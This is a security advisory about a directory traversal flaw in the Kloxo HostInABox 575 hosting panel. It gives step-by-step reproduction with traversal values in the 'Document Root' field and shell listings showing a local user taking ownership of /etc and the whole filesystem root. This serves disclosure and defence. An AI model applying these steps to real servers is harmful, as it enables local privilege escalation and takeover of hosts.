Kloxo HostInABox 575 - yet another symlink attack for local users



DESCRIPTION


Local users can create arbitrary directories anywhere on the filesystem via directory traversal in the "Document Root" field when adding a new domain. By pointing that field at an existing directory they can also take ownership of it.



IMPACT


Local users could obtain root privileges.

1. Log into Kloxo
2. Click "Domains"
3. In the field labeled "Domain Name", type: example.com
4. In the field labeled "Document Root", enter: ../../../../../../test

Observe that the directory /test has now been created:

[user1@testing574 /home/user1]$ ls -l / | grep test
drwxr-xr-x  4 user1 apache   4096 May 21 12:28 test

Alternatively, the user can enter the path of an existing directory to take ownership of it, such as ../../../../../../etc, or even the filesystem root: ../../../../../../../../

The latter value results in the root directory and its entries being owned by the local user:

[user1@testing574 /]$ ls -al /
total 288
drwxr-xr-x 25 user1 apache   4096 May 21 12:32 .
drwxr-xr-x 25 user1 apache   4096 May 21 12:32 ..
-rw-r--r--  1 user1 user1       0 May 18 21:44 .autofsck
-rw-r--r--  1 user1 user1       0 May 18 21:44 .autorelabel
-rw-------  1 user1 user1    1024 May 21 01:50 .rnd
lrwxrwxrwx  1 user1 user1      39 May 18 21:44 aquota.group -> /proc/vz/vzaquota/00000020/aquota.group
lrwxrwxrwx  1 user1 user1      38 May 18 21:44 aquota.user -> /proc/vz/vzaquota/00000020/aquota.user
drwxr-xr-x  2 user1 user1    4096 May 14 10:38 bin
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 boot
drwxr-xr-x  2 user1 user1    4096 May 21 12:32 cgi-bin
drwxr-xr-x  2 user1 user1    4096 May 13 06:40 command
drwxr-xr-x  4 user1 user1  122880 May 18 21:45 dev
drwxr-xr-x 56 user1 user1    4096 May 21 12:30 etc
drwxr-xr-x 14 user1 user1    4096 May 18 23:38 home
drwxr-xr-x 10 user1 user1    4096 May 13 06:38 lib
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 media
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 mnt
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 opt
dr-xr-xr-x 44 user1 user1       0 May 18 21:44 proc
drwxr-xr-x  7 user1 user1    4096 May  8 02:46 program-install
-rw-r--r--  1 user1 user1   68088 May 13 02:24 program-install.zip
drwx------  4 user1 user1    4096 May 21 12:28 root
drwxr-xr-x  2 user1 user1    4096 May 13 06:38 sbin
drwxr-xr-x  3 user1 user1    4096 May 18 21:44 script
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 selinux
drwxr-xr-x  2 user1 user1    4096 Oct  6  2008 service
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 srv
drwxr-xr-x  3 user1 user1       0 May 18 21:44 sys
drwxrwxrwt  2 user1 user1    4096 May 21 12:32 tmp
drwxr-xr-x 14 user1 user1    4096 May 13 06:42 usr
drwxr-xr-x 25 user1 user1    4096 May 14 10:39 var